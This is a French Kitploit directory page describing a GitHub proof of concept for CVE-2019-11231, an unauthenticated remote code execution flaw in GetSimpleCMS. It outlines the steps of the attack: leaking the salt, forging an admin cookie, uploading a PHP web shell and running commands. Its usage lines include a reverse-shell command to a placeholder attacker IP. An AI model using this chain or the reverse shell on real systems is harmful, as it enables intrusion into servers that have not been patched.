Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-11231-PoC — PoC CVE-2019-11231 | Kitploit
Outils/GitHubGitHub/akincibor/cve-2019-11231-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

PoC CVE-2019-11231

Voir le dépôt
11il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE GetSimpleCMS CVE-2019-11231

Python CVE

Exploit d'exécution de code à distance non authentifié pour GetSimpleCMS ≤ 3.3.15

Vulnérabilité

GetSimpleCMS expose publiquement des fichiers sensibles (/data/other/authorization.xml, /data/users/) permettant aux attaquants de :

  1. Fuiter des clés API et noms d'utilisateur
  2. Forger des cookies d'authentification
  3. Obtenir des jetons CSRF
  4. Télécharger et exécuter du code PHP arbitraire

Score CVSS : 9.8 (Critique)

Utilisation

pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Fonctionnement

  1. Énumérer la version → GET /admin/
  2. Fuiter le sel → GET /data/other/authorization.xml
  3. Obtenir le nom d'utilisateur → GET /data/users/
  4. Forger le cookie → SHA1(nom_utilisateur + sel)
  5. Obtenir le nonce → GET /admin/theme-edit.php
  6. Télécharger le shell → POST /admin/theme-edit.php
  7. Exécuter les commandes → GET /theme/shell.php?cmd=...

Fichiers

  • exploit.py - Script d'exploit principal
  • requirements.txt - Dépendances (requests, beautifulsoup4)

Avertissement

⚠️ À des fins éducatives uniquement. Testez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation de tester.

Références

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
Télécharger l’outil